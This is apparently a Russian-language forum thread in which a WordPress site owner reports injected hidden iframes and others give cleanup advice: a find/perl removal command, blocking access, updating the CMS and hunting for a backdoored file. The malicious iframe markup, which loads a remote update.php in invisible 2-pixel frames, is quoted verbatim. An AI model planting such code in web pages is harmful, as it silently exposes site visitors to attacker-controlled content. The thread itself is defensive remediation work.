В файлы на все сайты залез такой код:
<iframe src=”http://www.zw52.ru/wp-content/upgrade/update.php” width=”2″ height=”2″ frameborder=”0″></iframe><iframe src=”http://www.zw52.ru/wp-content/upgrade/update.php” width=”2″ height=”2″ frameborder=”0″></iframe><iframe src=”http://www.zw52.ru/wp-content/upgrade/update.php” width=”2″ height=”2″ frameborder=”0″></iframe>
Сайт начинает работать после удаления данного кода.
проблема вставки данного кода iframe заключается в уязвимости либо самого wordpress, либо какого-нибудь компонента. шелл может находится здесь
./<<DOMAIN>>/wp-content/themes/toolbox/error.php
вычистить можно командой
find . -type f -name ‘*.php’ -exec perl -pi -e ‘s/\<iframe\ src\=\”http\:\/\/www.z.*frame\>//g’ ‘{}’ \;
1) Блокируй доступ к сайту (deny from all, allow from 127.0.0.1) через штаккесс
2) Выпиливай ифреймы в шаблонах
3) Обновляй cms до последней версии
4) Поставь на сайты какой-нибудь веб-фаирвол подключаемый через auto_prepend_file
5) Не забудь найти на сайте все недавно изменённые файлы. Если найдутся те которые изменяться не должны (типа *.php в дире includes) – замени их на дистрибутивные – в них добавлен бекдор.
Аке. Напишу как домой приеду. Я кстати на работку устроился)
поздравляю! совсем большой стал 8))
Ты уже который раз упоминаешь про веб-файрволы. Не мог бы подробней рассказать об этом?